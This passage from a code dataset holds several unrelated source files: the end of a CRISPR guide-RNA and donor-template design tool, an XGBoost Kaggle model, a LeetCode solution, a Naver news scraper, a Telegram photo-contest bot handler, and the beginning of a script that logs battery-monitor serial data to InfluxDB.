recut_CFD_fail.write(this_log)\n\n if hasattr(HDR_template, \"info_phase4_5UTR\"):\n fiveUTR_log.write(\n f\"phase4_UTR\\t{HDR_template.info_phase4_5UTR[0]}\\t{HDR_template.info_phase4_5UTR[1]}\\n\"\n )\n if hasattr(HDR_template, \"info_phase5_5UTR\"):\n fiveUTR_log.write(\n f\"phase5_UTR\\t{HDR_template.info_phase5_5UTR[0]}\\t{HDR_template.info_phase5_5UTR[1]}\\n\"\n )\n else:\n csvout_res.write(f\"{Entry},{ENST_ID},ERROR: provided genomic coordinates are not in the {ENST_ID}\\n\")\n\n ###################################\n # best start gRNA and HDR template#\n ###################################\n if ENST_based == True and (target_terminus == \"ALL\" or target_terminus == \"N\"):\n if not ENST_in_db:\n Entry += 1\n csvout_N.write(ENST_ID)\n # get gRNAs\n ranked_df_gRNAs_ATG, ranked_df_gRNAs_stop = get_gRNAs(\n ENST_ID=ENST_ID,\n ENST_info=ENST_info,\n freq_dict=freq_dict,\n loc2file_index=loc2file_index,\n loc2posType=loc2posType,\n dist=max_cut2ins_dist,\n genome_ver=config[\"genome_ver\"],\n spec_score_flavor=spec_score_flavor,\n reg_penalty=reg_penalty,\n )\n\n if ranked_df_gRNAs_ATG.empty == True:\n start_info.failed.append(ENST_ID)\n csvout_N.write(\",,,,,\\n\")\n csvout_res.write(f\"{Entry},{ENST_ID},ERROR: no suitable gRNAs found\\n\")\n\n for i in range(0, min([gRNA_num_out, ranked_df_gRNAs_ATG.shape[0]])):\n # if best_start_gRNA.shape[0] > 1: # multiple best scoring gRNA\n # best_start_gRNA = best_start_gRNA[best_start_gRNA[\"CSS\"] == best_start_gRNA[\"CSS\"].max()] # break the tie by CSS score\n # best_start_gRNA = best_start_gRNA.head(1) #get the first row in case of ties\n current_gRNA = ranked_df_gRNAs_ATG.iloc[[i]]\n\n # get HDR template\n try:\n HDR_template = get_HDR_template(\n df=current_gRNA,\n ENST_info=ENST_info,\n type=\"start\",\n ENST_PhaseInCodon=ENST_PhaseInCodon,\n loc2posType=loc2posType,\n genome_ver=config[\"genome_ver\"],\n HDR_arm_len=HDR_arm_len,\n tag=config[\"Npayload\"],\n ssODN_max_size=ssODN_max_size,\n Donor_type=config[\"Donor_type\"],\n Strand_choice=config[\"Strand_choice\"],\n recoding_args=recoding_args,\n syn_check_args=syn_check_args,\n )\n except Exception as e:\n print(\"Unexpected error:\", str(sys.exc_info()))\n traceback.print_exc()\n print(\"additional information:\", e)\n PrintException()\n\n # append the best gRNA to the final df\n if i == 0:\n best_start_gRNAs = pd.concat([best_start_gRNAs, current_gRNA])\n\n # append cfd score to list for plotting\n pre_recoding_cfd_score = HDR_template.pre_recoding_cfd_score\n cfd1 = \"\"\n if hasattr(HDR_template, \"cfd_score_post_mut_ins\"):\n cfd1 = HDR_template.cfd_score_post_mut_ins\n if not hasattr(HDR_template, \"cfd_score_post_mut2\"):\n cfd2 = cfd1\n else:\n cfd2 = HDR_template.cfd_score_post_mut2\n if not hasattr(HDR_template, \"cfd_score_post_mut3\"):\n cfd3 = cfd2\n else:\n cfd3 = HDR_template.cfd_score_post_mut3\n if not hasattr(HDR_template, \"cfd_score_post_mut4\"):\n cfd4 = cfd3\n else:\n cfd4 = HDR_template.cfd_score_post_mut4\n cfd_scan = 0\n cfd_scan_no_recode = 0\n if hasattr(HDR_template, \"cfd_score_highest_in_win_scan\"):\n cfd_scan = HDR_template.cfd_score_highest_in_win_scan\n cfd_scan_no_recode = HDR_template.scan_highest_cfd_no_recode\n\n cfdfinal = HDR_template.final_cfd\n\n strands = f\"{HDR_template.ENST_strand}/{HDR_template.gStrand}/{HDR_template.Donor_strand}\"\n\n # write csv\n (\n spec_score,\n seq,\n pam,\n s,\n e,\n cut2ins_dist,\n spec_weight,\n dist_weight,\n pos_weight,\n final_weight,\n ) = get_res(current_gRNA, spec_score_flavor)\n\n donor = 
HDR_template.Donor_final\n donor_trimmed = \"N/A for ssODN\"\n if config[\"Donor_type\"] == \"dsDNA\":\n donor_trimmed = HDR_template.Donor_final\n donor = HDR_template.Donor_pretrim\n \n # gRNA and donor names\n ENST_design_counts[ENST_ID] = ENST_design_counts.get(ENST_ID, 0) + 1\n gRNA_name = f\"{ENST_ID}_gRNA_{ENST_design_counts[ENST_ID]}\"\n donor_name = f\"{ENST_ID}_donor_{ENST_design_counts[ENST_ID]}\"\n if config[\"Donor_type\"] == \"dsDNA\":\n donor_trimmed_name = f\"{ENST_ID}_donor_trimmed_{ENST_design_counts[ENST_ID]}\"\n else:\n donor_trimmed_name = \"N/A for ssODN\"\n\n gRNA_cut_pos = (\n HDR_template.CutPos\n ) # InsPos is the first letter of stop codon \"T\"AA or the last letter of the start codon AT\"G\"\n insert_pos = HDR_template.InsPos\n if config[\"recoding_off\"]:\n csvout_N.write(\n f\",{cfd1},{cfd2},{cfd3},{cfd4},{cfd_scan},{cfd_scan_no_recode},{cfdfinal}\\n\"\n )\n csvout_res.write(\n f\"{Entry},{row_prefix},N,{gRNA_name},{seq},{pam},{s},{e},{gRNA_cut_pos},{insert_pos},{cut2ins_dist},{spec_score},{ret_six_dec(spec_weight)},{ret_six_dec(dist_weight)},{ret_six_dec(pos_weight)},{ret_six_dec(final_weight)},{ret_six_dec(pre_recoding_cfd_score)},recoding turned off,,{ret_six_dec(cfdfinal)},{donor_name},{donor},{donor_trimmed_name},{donor_trimmed},{HDR_template.effective_HA_len},{HDR_template.synFlags},{HDR_template.cutPos2nearestOffLimitJunc},{strands}\\n\"\n )\n csvout_res2.write(f\"{Entry},\"+\n config[\"genome_ver\"]\n + f\",{HDR_template.ENST_chr},{insert_pos},{ENST_ID},{name}\\n\"\n )\n else:\n csvout_N.write(\n f\",{cfd1},{cfd2},{cfd3},{cfd4},{cfd_scan},{cfd_scan_no_recode},{cfdfinal}\\n\"\n )\n if not isinstance(cfd4, float):\n cfd4 = \"\"\n csvout_res.write(\n f\"{Entry},{row_prefix},N,{gRNA_name},{seq},{pam},{s},{e},{gRNA_cut_pos},{insert_pos},{cut2ins_dist},{spec_score},{ret_six_dec(spec_weight)},{ret_six_dec(dist_weight)},{ret_six_dec(pos_weight)},{ret_six_dec(final_weight)},{ret_six_dec(pre_recoding_cfd_score)},{ret_six_dec(cfd4)},{ret_six_dec(cfd_scan)},{ret_six_dec(cfdfinal)},{donor_name},{donor},{donor_trimmed_name},{donor_trimmed},{HDR_template.effective_HA_len},{HDR_template.synFlags},{HDR_template.cutPos2nearestOffLimitJunc},{strands}\\n\"\n )\n csvout_res2.write(f\"{Entry},\"+\n config[\"genome_ver\"]\n + f\",{HDR_template.ENST_chr},{insert_pos},{ENST_ID},{name}\\n\"\n )\n\n # write log\n this_log = f\"{HDR_template.info}{HDR_template.info_arm}{HDR_template.info_p1}{HDR_template.info_p2}{HDR_template.info_p3}{HDR_template.info_p4}{HDR_template.info_p5}{HDR_template.info_p6}\\n--------------------final CFD:{ret_six_dec(HDR_template.final_cfd)}\\n donor before any recoding:{HDR_template.Donor_vanillia}\\n donor after all recoding:{HDR_template.Donor_postMut}\\ndonor centered(if applicable):{HDR_template.Donor_final}\\n donor (best strand):{HDR_template.Donor_final}\\n\\n\"\n recut_CFD_all.write(this_log)\n if HDR_template.final_cfd > 0.03:\n recut_CFD_fail.write(this_log)\n\n if hasattr(HDR_template, \"info_phase4_5UTR\"):\n fiveUTR_log.write(\n f\"phase4_UTR\\t{HDR_template.info_phase4_5UTR[0]}\\t{HDR_template.info_phase4_5UTR[1]}\\n\"\n )\n if hasattr(HDR_template, \"info_phase5_5UTR\"):\n fiveUTR_log.write(\n f\"phase5_UTR\\t{HDR_template.info_phase5_5UTR[0]}\\t{HDR_template.info_phase5_5UTR[1]}\\n\"\n )\n\n ##################################\n # best stop gRNA and HDR template#\n ##################################\n if ENST_based == True and (target_terminus == \"ALL\" or target_terminus == \"C\"):\n if not ENST_in_db:\n Entry += 1\n 
csvout_C.write(ENST_ID)\n\n # get gRNAs\n ranked_df_gRNAs_ATG, ranked_df_gRNAs_stop = get_gRNAs(\n ENST_ID=ENST_ID,\n ENST_info=ENST_info,\n freq_dict=freq_dict,\n loc2file_index=loc2file_index,\n loc2posType=loc2posType,\n dist=max_cut2ins_dist,\n genome_ver=config[\"genome_ver\"],\n spec_score_flavor=spec_score_flavor,\n reg_penalty=reg_penalty,\n )\n\n if ranked_df_gRNAs_stop.empty == True:\n stop_info.failed.append(ENST_ID)\n csvout_C.write(\",,,,,\\n\")\n csvout_res.write(f\"{Entry},{ENST_ID},ERROR: no suitable gRNAs found\\n\")\n\n for i in range(0, min([gRNA_num_out, ranked_df_gRNAs_stop.shape[0]])):\n # if best_stop_gRNA.shape[0] > 1: # multiple best scoring gRNA\n # best_stop_gRNA = best_stop_gRNA[best_stop_gRNA[\"CSS\"] == best_stop_gRNA[\"CSS\"].max()] # break the tie by CSS score\n # best_stop_gRNA = best_stop_gRNA.head(1) #get the first row in case of ties\n current_gRNA = ranked_df_gRNAs_stop.iloc[[i]]\n\n # get HDR template\n try:\n HDR_template = get_HDR_template(\n df=current_gRNA,\n ENST_info=ENST_info,\n type=\"stop\",\n ENST_PhaseInCodon=ENST_PhaseInCodon,\n loc2posType=loc2posType,\n HDR_arm_len=HDR_arm_len,\n genome_ver=config[\"genome_ver\"],\n tag=config[\"Cpayload\"],\n Donor_type=config[\"Donor_type\"],\n Strand_choice=config[\"Strand_choice\"],\n ssODN_max_size=ssODN_max_size,\n recoding_args=recoding_args,\n syn_check_args=syn_check_args,\n )\n except Exception as e:\n print(\"Unexpected error:\", str(sys.exc_info()))\n traceback.print_exc()\n print(\"additional information:\", e)\n PrintException()\n\n # append the best gRNA to the final df\n best_stop_gRNAs = pd.concat([best_stop_gRNAs, current_gRNA])\n\n # append cfd score to list for plotting\n pre_recoding_cfd_score = HDR_template.pre_recoding_cfd_score\n cfd1 = \"\"\n if hasattr(HDR_template, \"cfd_score_post_mut_ins\"):\n cfd1 = HDR_template.cfd_score_post_mut_ins\n if not hasattr(HDR_template, \"cfd_score_post_mut2\"):\n cfd2 = cfd1\n else:\n cfd2 = HDR_template.cfd_score_post_mut2\n if not hasattr(HDR_template, \"cfd_score_post_mut3\"):\n cfd3 = cfd2\n else:\n cfd3 = HDR_template.cfd_score_post_mut3\n if not hasattr(HDR_template, \"cfd_score_post_mut4\"):\n cfd4 = cfd3\n else:\n cfd4 = HDR_template.cfd_score_post_mut4\n\n cfd_scan = 0\n cfd_scan_no_recode = 0\n if hasattr(HDR_template, \"cfd_score_highest_in_win_scan\"):\n cfd_scan = HDR_template.cfd_score_highest_in_win_scan\n cfd_scan_no_recode = HDR_template.scan_highest_cfd_no_recode\n\n cfdfinal = HDR_template.final_cfd\n\n strands = f\"{HDR_template.ENST_strand}/{HDR_template.gStrand}/{HDR_template.Donor_strand}\"\n\n # write csv\n (\n spec_score,\n seq,\n pam,\n s,\n e,\n cut2ins_dist,\n spec_weight,\n dist_weight,\n pos_weight,\n final_weight,\n ) = get_res(current_gRNA, spec_score_flavor)\n\n donor = HDR_template.Donor_final\n donor_trimmed = \"N/A for ssODN\"\n if config[\"Donor_type\"] == \"dsDNA\":\n donor_trimmed = HDR_template.Donor_final\n donor = HDR_template.Donor_pretrim\n \n # gRNA and donor names\n ENST_design_counts[ENST_ID] = ENST_design_counts.get(ENST_ID, 0) + 1\n gRNA_name = f\"{ENST_ID}_gRNA_{ENST_design_counts[ENST_ID]}\"\n donor_name = f\"{ENST_ID}_donor_{ENST_design_counts[ENST_ID]}\"\n if config[\"Donor_type\"] == \"dsDNA\":\n donor_trimmed_name = f\"{ENST_ID}_donor_trimmed_{ENST_design_counts[ENST_ID]}\"\n else:\n donor_trimmed_name = \"N/A for ssODN\"\n\n gRNA_cut_pos = (\n HDR_template.CutPos\n ) # InsPos is the first letter of stop codon \"T\"AA or the last letter of the start codon AT\"G\"\n insert_pos = 
HDR_template.InsPos\n if config[\"recoding_off\"]:\n csvout_C.write(\n f\",{cfd1},{cfd2},{cfd3},{cfd4},{cfd_scan},{cfd_scan_no_recode},{cfdfinal}\\n\"\n )\n csvout_res.write(\n f\"{Entry},{row_prefix},C,{gRNA_name},{seq},{pam},{s},{e},{gRNA_cut_pos},{insert_pos},{cut2ins_dist},{spec_score},{ret_six_dec(spec_weight)},{ret_six_dec(dist_weight)},{ret_six_dec(pos_weight)},{ret_six_dec(final_weight)},{ret_six_dec(pre_recoding_cfd_score)},recoding turned off,,{ret_six_dec(cfdfinal)},{donor_name},{donor},{donor_trimmed_name},{donor_trimmed},{HDR_template.effective_HA_len},{HDR_template.synFlags},{HDR_template.cutPos2nearestOffLimitJunc},{strands}\\n\"\n )\n csvout_res2.write( f\"{Entry},\"+\n config[\"genome_ver\"]\n + f\",{HDR_template.ENST_chr},{insert_pos},{ENST_ID},{name}\\n\"\n )\n else:\n csvout_C.write(\n f\",{cfd1},{cfd2},{cfd3},{cfd4},{cfd_scan},{cfd_scan_no_recode},{cfdfinal}\\n\"\n )\n if not isinstance(cfd4, float):\n cfd4 = \"\"\n csvout_res.write(\n f\"{Entry},{row_prefix},C,{gRNA_name},{seq},{pam},{s},{e},{gRNA_cut_pos},{insert_pos},{cut2ins_dist},{spec_score},{ret_six_dec(spec_weight)},{ret_six_dec(dist_weight)},{ret_six_dec(pos_weight)},{ret_six_dec(final_weight)},{ret_six_dec(pre_recoding_cfd_score)},{ret_six_dec(cfd4)},{ret_six_dec(cfd_scan)},{ret_six_dec(cfdfinal)},{donor_name},{donor},{donor_trimmed_name},{donor_trimmed},{HDR_template.effective_HA_len},{HDR_template.synFlags},{HDR_template.cutPos2nearestOffLimitJunc},{strands}\\n\"\n )\n csvout_res2.write(f\"{Entry},\"+\n config[\"genome_ver\"]\n + f\",{HDR_template.ENST_chr},{insert_pos},{ENST_ID},{name}\\n\"\n )\n\n # write log\n this_log = f\"{HDR_template.info}{HDR_template.info_arm}{HDR_template.info_p1}{HDR_template.info_p2}{HDR_template.info_p3}{HDR_template.info_p4}{HDR_template.info_p5}{HDR_template.info_p6}\\n--------------------final CFD:{ret_six_dec(HDR_template.final_cfd)}\\n donor before any recoding:{HDR_template.Donor_vanillia}\\n donor after all recoding:{HDR_template.Donor_postMut}\\n donor centered:{HDR_template.Donor_final}\\ndonor centered (best strand):{HDR_template.Donor_final}\\n\\n\"\n recut_CFD_all.write(this_log)\n if HDR_template.final_cfd > 0.03:\n recut_CFD_fail.write(this_log)\n\n if hasattr(HDR_template, \"info_phase4_5UTR\"):\n fiveUTR_log.write(\n f\"phase4_UTR\\t{HDR_template.info_phase4_5UTR[0]}\\t{HDR_template.info_phase4_5UTR[1]}\\n\"\n )\n if hasattr(HDR_template, \"info_phase5_5UTR\"):\n fiveUTR_log.write(\n f\"phase5_UTR\\t{HDR_template.info_phase5_5UTR[0]}\\t{HDR_template.info_phase5_5UTR[1]}\\n\"\n )\n\n protein_coding_transcripts_count += 1\n # else:\n # log.info(f\"skipping {ENST_ID} transcript type: {transcript_type} b/c transcript is not protein_coding\")\n transcript_count += 1\n # report progress\n if (\n protein_coding_transcripts_count % 100 == 0\n and protein_coding_transcripts_count != 0\n ):\n endtime = datetime.datetime.now()\n elapsed_sec = endtime - starttime\n elapsed_min = elapsed_sec.seconds / 60\n log.info(\n f\"processed {protein_coding_transcripts_count}/{transcript_count} transcripts, elapsed time {elapsed_min:.2f} min ({elapsed_sec} sec)\"\n )\n\n # write csv out\n endtime = datetime.datetime.now()\n elapsed_sec = endtime - starttime\n elapsed_min = elapsed_sec.seconds / 60\n\n if \"num_to_process\" in locals():\n pass\n else:\n num_to_process = \"all\"\n\n log.info(\n f\"finished in {elapsed_min:.2f} min ({elapsed_sec} sec) , processed {protein_coding_transcripts_count}/{transcript_count} transcripts\\nnonprotein-coding transcripts were skipped\\n\"\n 
f\"results written to {config['outdir']}\"\n )\n\n recut_CFD_all.close()\n recut_CFD_fail.close()\n csvout_N.close()\n csvout_C.close()\n fiveUTR_log.close()\n csvout_res.close()\n csvout_res2.close()\n\n except Exception as e:\n print(\"Unexpected error:\", str(sys.exc_info()))\n traceback.print_exc()\n print(\"additional information:\", e)\n PrintException()\n\n## end of main()\n\ndef ret_six_dec(myvar):\n \"\"\"\n retain six decimal points for printout\n \"\"\"\n if type(myvar) == float:\n return f\"{myvar:.6f}\"\n elif type(myvar) == int:\n myvar = float(myvar)\n return f\"{myvar:.6f}\"\n else:\n return myvar\n\n\ndef mkdir(mypath):\n if not os.path.exists(mypath):\n os.makedirs(mypath)\n\n\ndef deepmerge(dict1, dict2):\n \"\"\"\n merge two dictionary at the secondary key level\n \"\"\"\n if len(dict1) == 0:\n return dict2\n if len(dict2) == 0:\n return dict1\n # start merging\n dictm = dict1\n for k in dict2:\n if k in dict1: # shared key\n for k2 in dict2[k].keys():\n dictm[k][k2] = dict2[k][k2]\n else:\n dictm[k] = dict2[k]\n return dictm\n\n\nclass info:\n \"\"\"\n info log class\n \"\"\"\n def __init__(self) -> None:\n self.cfd1 = []\n self.cfd2 = []\n self.cfd3 = []\n self.cfd4 = []\n self.cfdfinal = []\n self.failed = []\n\n\ndef get_res(best_start_gRNA, spec_score_flavor):\n spec_score = best_start_gRNA[spec_score_flavor].values[0]\n seq = best_start_gRNA[\"seq\"].values[0]\n pam = best_start_gRNA[\"pam\"].values[0]\n s = best_start_gRNA[\"start\"].values[0]\n e = best_start_gRNA[\"end\"].values[0]\n cut2ins_dist = best_start_gRNA[\"Cut2Ins_dist\"].values[0]\n spec_weight = best_start_gRNA[\"spec_weight\"].values[0]\n dist_weight = best_start_gRNA[\"dist_weight\"].values[0]\n pos_weight = best_start_gRNA[\"pos_weight\"].values[0]\n final_weight = best_start_gRNA[\"final_weight\"].values[0]\n return [\n spec_score,\n seq,\n pam,\n s,\n e,\n cut2ins_dist,\n spec_weight,\n dist_weight,\n pos_weight,\n final_weight,\n ]\n\n\ndef test_memory(n):\n \"\"\"\n try allocate n MB of memory\n return true if can, and false otherwise\n \"\"\"\n try:\n x = bytearray(1024 * 1000 * n)\n del x\n return True\n except:\n return False\n\n\ndef PrintException():\n exc_type, exc_obj, tb = sys.exc_info()\n f = tb.tb_frame\n lineno = tb.tb_lineno\n filename = f.f_code.co_filename\n linecache.checkcache(filename)\n line = linecache.getline(filename, lineno, f.f_globals)\n print(\n 'EXCEPTION IN ({}, LINE {} \"{}\"): {}'.format(\n filename, lineno, line.strip(), exc_obj\n )\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"czbiohub-sf/protoSpaceJAM","sub_path":"protoSpaceJAM/protoSpaceJAM.py","file_name":"protoSpaceJAM.py","file_ext":"py","file_size_in_byte":55991,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"34642030460","text":"####################################################\n#\n# XGBoost Model\n#\n# Mike Bernico CS570 10/12/2016\n#\n####################################################\n\n\nimport numpy as np\nimport pandas as pd\nimport xgboost\nfrom sklearn.grid_search import RandomizedSearchCV\n\n\ndef create_search():\n xgb = xgboost.XGBClassifier(nthread=6, n_estimators=300)\n hyperparameters = {'colsample_bytree': [.3, .4, .5, 1], 'max_depth': [10, 12, 14, 16],\n 'learning_rate': np.arange(0.01, 0.4, .1)}\n return RandomizedSearchCV(xgb, hyperparameters, cv=3, scoring='roc_auc', n_iter=15)\n\n\ndf = pd.read_csv(\"./data/boruta_filtered_train.csv\")\ny = df['y']\nX = df.drop(['y'], axis=1)\n\nprint(\"Fitting 
RandomizedSearch. Please Wait (awhile)...\")\nsearch = create_search()\nsearch.fit(X, y)\nprint(\"Done!\")\nprint(\"Best Parameters: \")\nprint(search.best_params_)\nprint(\"Best Score:\")\nprint(search.best_score_)\n\n# Create Submission\nkaggle_test = pd.read_csv(\"./work_dir/my_midterm_kaggle_submission.csv\")\nselected_features = pd.read_csv(\"./work_dir/feature_support.csv\")\nkaggle_test_selected = kaggle_test.ix[:, selected_features['0'].values] # trim to the boruta features\n\nprediction = pd.DataFrame(search.best_estimator_.predict_proba(kaggle_test_selected)[:, 1])\nprediction.columns = ['y']\nprediction.to_csv(\"xgboost_model_prediction.csv\", index_label=\"Id\")\n\n# {'max_depth': 14, 'learning_rate': 0.11, 'colsample_bytree': 1}\n# Best Score:\n# 0.9808915808045747\n","repo_name":"mbernico/csc570_midterm_stack_model","sub_path":"xgboost_model.py","file_name":"xgboost_model.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19714098657","text":"class Solution:\n def maxProfit(self, prices: 'List[int]') -> 'int':\n n = len(prices)\n if n < 2:\n return 0\n buy = [0 for i in range(n)]\n s1, s2, sell = buy[:], buy[:], buy[:]\n buy[0], s1[0] = -prices[0], -prices[0]\n for i in range(1, n):\n buy[i] = s2[i - 1] - prices[i]\n s1[i] = max(s1[i - 1], buy[i - 1])\n s2[i] = max(s2[i - 1], sell[i - 1])\n sell[i] = max(buy[i - 1], s1[i - 1]) + prices[i]\n return max(sell[n - 1], s2[n - 1])\n\n\nif __name__ == \"__main__\":\n a = Solution()\n print(a.maxProfit([1,2,4]))","repo_name":"isabella0428/Leetcode","sub_path":"python/309.py","file_name":"309.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"70012069203","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nfrom functions import return_keyword\r\nfrom home.models import StockModel\r\nfrom wordcloud import WordCloud\r\nfrom collections import Counter\r\n\r\n\r\ndef Crawling(search_text,start_date,end_date):\r\n titles=[]\r\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36'}\r\n\r\n for i in range(1,201,10):\r\n try:\r\n url_basic = 'https://search.naver.com/search.naver?where=news&sm=tab_pge&query={}&sort=1&photo=0&field=0&pd=3&ds={}&de={}&mynews=0&office_type=0&office_section_code=0&news_office_checked=&nso=so:dd,p:from20210810to20210814,a:all&start={}'.format(search_text,start_date,end_date,i)\r\n\r\n data = requests.get(url_basic, headers=headers)\r\n soup = BeautifulSoup(data.text, 'html.parser')\r\n\r\n news_titles = soup.find_all('a',attrs={'class':'news_tit'})\r\n\r\n for title in news_titles:\r\n titles.append([title['title'], title['href']])\r\n except:\r\n pass\r\n\r\n return titles\r\n","repo_name":"bob8dod/Sejong_Hackathon","sub_path":"news_crawling.py","file_name":"news_crawling.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40293209363","text":"from datetime import datetime, timedelta\nfrom typing import Any\n\nfrom aiogram import Bot, types\nfrom aiogram.exceptions import TelegramBadRequest\nfrom aiogram.fsm.context import FSMContext\nfrom aiogram.fsm.state import State, StatesGroup\nfrom babel.dates import format_date, get_month_names\n\nfrom db.db_operations import AdminDB, ObjectFactory\nfrom 
handlers.internal_logic.admin import i_set_theme\nfrom reminders import add_reminder\nfrom utils.admin_keyboard import AdminKeyboard, CallbackManage\n\n\nclass ContestCreate(StatesGroup):\n name_contest = State()\n are_you_sure = State()\n will_you_post = State()\n thanks_for_info = State()\n\n\nasync def set_theme(\n query: types.CallbackQuery,\n callback_data: CallbackManage,\n state: FSMContext,\n msg: dict,\n):\n if not query.message:\n return\n keyboard: AdminKeyboard = AdminKeyboard.fromcallback(callback_data)\n await query.message.edit_text(\n text=msg[\"contest\"][\"create_greet_contest\"], parse_mode=\"HTML\"\n )\n data = {}\n data[\"group\"] = callback_data.group_id\n data[\"user_id\"] = query.from_user.id\n data[\"msg_id\"] = query.message.message_id\n data[\"keyboard\"] = keyboard\n data[\"file_id\"] = None\n await state.set_data(data)\n await state.set_state(ContestCreate.name_contest)\n\n\nasync def set_theme_accept_message(\n message: types.Message, bot: Bot, state: FSMContext, admin_unit: AdminDB, msg: dict\n):\n if not message.text:\n return\n data_theme_date = message.text.split()\n data: dict[str, Any] = await state.get_data()\n\n if (\n len(data_theme_date) != 1\n or data_theme_date[0].lower() == \"отмена\"\n or data_theme_date[0].lower() == \"cancel\"\n ):\n text = msg[\"contest\"][\"cancel_contest\"]\n keyboard: AdminKeyboard = data[\"keyboard\"]\n await state.clear()\n await bot.edit_message_text(\n text=text,\n chat_id=data[\"user_id\"],\n message_id=data[\"msg_id\"],\n reply_markup=keyboard.keyboard_back,\n )\n else:\n # temporary turn-off time = data_theme_date[1] + data_theme_date[2]\n # time = \"1неделя\"\n time = \"2неделя\"\n theme = ObjectFactory.build_theme_fsm(data_theme_date[0])\n week_to_second: dict[str, int] = {\n \"1неделя\": 604800,\n \"1неделю\": 604800,\n \"2недели\": 1209600,\n \"2неделя\": 1209600,\n \"3неделя\": 1814400,\n \"3недели\": 1814400,\n }\n try:\n date_without_hms = datetime.utcnow().replace(\n hour=6, minute=0, second=0, microsecond=0\n )\n one_day = timedelta(days=1).total_seconds()\n time = int(week_to_second[time] + date_without_hms.timestamp() - one_day)\n try:\n await add_reminder(time, data[\"group\"])\n except Exception as e:\n await message.reply(\"Не удалось установить напоминание\")\n print(e)\n except KeyError:\n await message.reply(msg[\"admin\"][\"wrong_time\"])\n await state.clear()\n return\n\n link = await admin_unit.get_last_results_link(int(data[\"group\"]))\n if link is not None:\n link_msg = f'Результаты предыдущего челленджа вот тут.'\n else:\n link_msg = \"\"\n text = await i_set_theme(theme, admin_unit, int(data[\"group\"]), time)\n\n num = str(await admin_unit.count_contests(int(data[\"group\"])))\n\n # Get the current date\n now = datetime.now()\n end = timedelta(seconds=time) + now\n\n week_parent: dict[int, str] = {\n 0: \"понедельника\",\n 1: \"вторника\",\n 2: \"среды\",\n 3: \"четверга\",\n 4: \"пятницы\",\n 5: \"субботы\",\n 6: \"воскресенья\",\n }\n\n # Get the short and full month names in Russian\n full_month_names = get_month_names(\"wide\", locale=\"ru\")\n\n # Get the day name and format the date\n week = week_parent[end.weekday()]\n date_now = format_date(now.date(), format=\"d\", locale=\"ru\") + \" \" # day number\n date_now += full_month_names[now.month] # month name\n date_str = format_date(end.date(), format=\"d\", locale=\"ru\") + \" \"\n date_str += full_month_names[end.month]\n\n ret_text = (\n msg[\"contest\"][\"start_contest\"].format(\n num=num, theme=theme, date_now=date_now, 
date_str=date_str, week=week\n )\n + link_msg\n )\n await bot.edit_message_text(\n text=msg[\"contest\"][\"will_you_post\"],\n chat_id=data[\"user_id\"],\n message_id=data[\"msg_id\"],\n parse_mode=\"HTML\",\n )\n data[\"send\"] = await bot.send_message(\n text=ret_text, chat_id=data[\"user_id\"], parse_mode=\"HTML\"\n )\n\n await state.set_data(data)\n await state.set_state(ContestCreate.will_you_post)\n\n\nasync def should_i_post_theme(\n message: types.Message, bot: Bot, state: FSMContext, msg: dict\n):\n data: dict[str, Any] = await state.get_data()\n\n if message.text and (message.text.lower() == \"ок\" or message.text.lower() == \"ok\"):\n message_to_pin = await bot.copy_message(\n chat_id=data[\"group\"],\n from_chat_id=data[\"user_id\"],\n message_id=data[\"send\"].message_id,\n )\n\n try:\n await bot.pin_chat_message(\n chat_id=data[\"group\"], message_id=message_to_pin.message_id\n )\n except TelegramBadRequest:\n await bot.send_message(chat_id=data[\"group\"], text=msg[\"contest\"][\"err\"])\n await state.clear()\n return\n else:\n data[\"send\"] = await message.copy_to(chat_id=data[\"user_id\"], parse_mode=\"HTML\")\n\n await state.set_data(data)\n await state.set_state(ContestCreate.will_you_post)\n","repo_name":"vlle/Photoshnaya","sub_path":"app/handlers/contest_fsm.py","file_name":"contest_fsm.py","file_ext":"py","file_size_in_byte":6051,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"39204119828","text":"\nimport re\n\ndef reader(filename):\n with open(filename,\"r\") as file:\n line = file.readlines()\n data = [re.split(r'[[\\]]',l.strip()) for l in line]\n return data\n \n\nnumber = reader(\"18_input.txt\")\na = 0\n\n\n","repo_name":"MaazJamal/AOC2021","sub_path":"18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35230618691","text":"\n#!/usr/bin/env python\n\n\n\"\"\"\n 2020-05-26\n\n Created 22 April 2007\n By David A. 
Mellis \n modified 2020-05-26\n by David Buron\n \n This example code is in the public domain.\n \n\"\"\"\n\nimport os\nimport sys\nimport time\nimport serial\nfrom influxdb import InfluxDBClient\n\n# p - location of the data in the string, starting at 0!\n# s - size of the data (for example, SOC is 2)\n# d - the name of the variable in this case var sbms\ndef dcmp(p, s, d):\n\n xx = 0;\n\n for z in range(s):\n# Java script: xx = xx + ((d.charCodeAt((p + s - 1) -z) -35) * Math.pow(91, z$))\n wanted_ascii_character = ord(chr(d[(p + s - 1) - z]))\n xx = xx + ((wanted_ascii_character - 35) * pow(91, z))\n\n return xx\n\n#Connect to local InfluxDB and Database\nclient = InfluxDBClient(host='localhost', port=8086)\nclient.switch_database('SBMS')\n\nvar_sbms = ''\n\n# Receiving Data\nwhile True:\n\tx=os.path.exists('/dev/ttyUSB0')\n#Open Serial connection from USB, SBMS0 must be set to same BAUD rate\n\tif(x==1):\n\t\tser = serial.Serial('/dev/ttyUSB0', 115200)\n\t\tdata = ser.readline()\n\t\tif not data:\n\t\t\tbreak\n\t\tvar_sbms = data\n\n\n\t#Debug output from SBMS0\n\t#\tprint(var_sbms)\n\t#\tprint(str(dcmp(0, 27, var_sbms)) + str(var_sbms[28]) + str(dcmp(29, len(var_sbms)-29, var_sbms)))\n\n\t# process the SBMS data\n\t\tSOC = float(dcmp(6, 2, var_sbms))\n\t# 